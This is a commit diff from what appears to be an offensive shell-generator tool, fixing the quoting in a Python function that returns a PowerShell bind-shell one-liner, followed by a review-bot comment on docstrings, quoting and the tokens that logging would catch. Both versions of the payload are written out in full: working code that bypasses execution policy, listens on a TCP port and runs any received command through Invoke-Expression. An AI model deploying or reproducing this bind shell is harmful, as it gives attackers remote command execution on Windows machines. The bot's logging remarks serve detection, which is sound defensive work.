
Fixing PowerShell bind shell
Quote confusion ...
Andre Marques (zc00l) committed Aug 11, 2018
1 parent 5380156 commit c0b7f97
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion src/bind.py
Expand Up @@ -47,7 +47,7 @@ def BIND_NETCAT_TRADITIONAL_TCP():


def BIND_POWERSHELL_TCP():
return """powershell.exe -nop -ep bypass -Command '$VAR1=PORT;$VAR2=[System.Net.Sockets.TcpListener]$VAR1;$VAR2.Start();$VAR3=$VAR2.AcceptTCPClient();$VAR4=$VAR3.GetStream();[byte[]]$VAR5=0..65535|%{0};$VAR6=([text.encoding]::ASCII).GetBytes(\\"Windows PowerShell running as user \\"+$env:username+\\" on \\"+$env:computername+\\"`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n\\");$VAR4.Write($VAR6,0,$VAR6.Length);$VAR6=([text.encoding]::ASCII).GetBytes(\\"PS \\"+(Get-Location).Path+\\"> \\");$VAR4.Write($VAR6,0,$VAR6.Length);while(($VAR7=$VAR4.Read($VAR5,0,$VAR5.Length)) -ne 0){$VAR8=([text.encoding]::ASCII).GetString($VAR5,0,$VAR7);try{$VAR9=(Invoke-Expression -command $VAR8 2>&1 | Out-String )}catch{Write-Warning \\"Something went wrong with execution of command on the target.\\";Write-Error $_;};$VAR10=$VAR9+ \\"PS \\"+(Get-Location).Path+\\"> \\";$VAR11=($error[0] | Out-String);$error.clear();$VAR10=$VAR10+$VAR11;$VAR6=([text.encoding]::ASCII).GetBytes($VAR10);$VAR4.Write($VAR6,0,$VAR6.Length);$VAR4.Flush();};$VAR3.Close();if($VAR2){$VAR2.Stop();};'"""
return """powershell.exe -nop -ep bypass -Command "$VAR1=PORT;$VAR2=[System.Net.Sockets.TcpListener]$VAR1;$VAR2.Start();$VAR3=$VAR2.AcceptTCPClient();$VAR4=$VAR3.GetStream();[byte[]]$VAR5=0..65535|%{0};$VAR6=([text.encoding]::ASCII).GetBytes('Windows PowerShell running as user '+$env:username+' on '+$env:computername+'`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n');$VAR4.Write($VAR6,0,$VAR6.Length);$VAR6=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$VAR4.Write($VAR6,0,$VAR6.Length);while(($VAR7=$VAR4.Read($VAR5,0,$VAR5.Length)) -ne 0){$VAR8=([text.encoding]::ASCII).GetString($VAR5,0,$VAR7);try{$VAR9=(Invoke-Expression -command $VAR8 2>&1 | Out-String )}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$VAR10=$VAR9+ 'PS '+(Get-Location).Path + '> ';$VAR11=($error[0] | Out-String);$error.clear();$VAR10=$VAR10+$VAR11;$VAR6=([text.encoding]::ASCII).GetBytes($VAR10);$VAR4.Write($VAR6,0,$VAR6.Length);$VAR4.Flush();};$VAR3.Close();if($VAR2){$VAR2.Stop();};" """


# Removed from MetasploitFramework
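Review bot: BIND_POWERSHELL_TCP has no docstring, and the return line that wraps the -Command argument in double quotes (the second of the two, apparently the new side) closes with `" """`, so the returned string ends in a space that exists only to keep the final `"` away from the triple-quote delimiter. A one-line docstring would make the contract visible, for example `"""Return the PowerShell TCP listener one-liner; PORT and $VAR1..$VAR11 are placeholders (presumably substituted by the caller)."""`, together with a comment that the outer quotes are double and the inner PowerShell strings single, since that convention is exactly what this commit changes. Delimiting the Python literal with `'''` instead would remove the need for the padding space. For readers on the defensive side, the template's fixed tokens (`-nop -ep bypass`, `[System.Net.Sockets.TcpListener]`, `Invoke-Expression`) are what process command-line and script-block logging would record.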
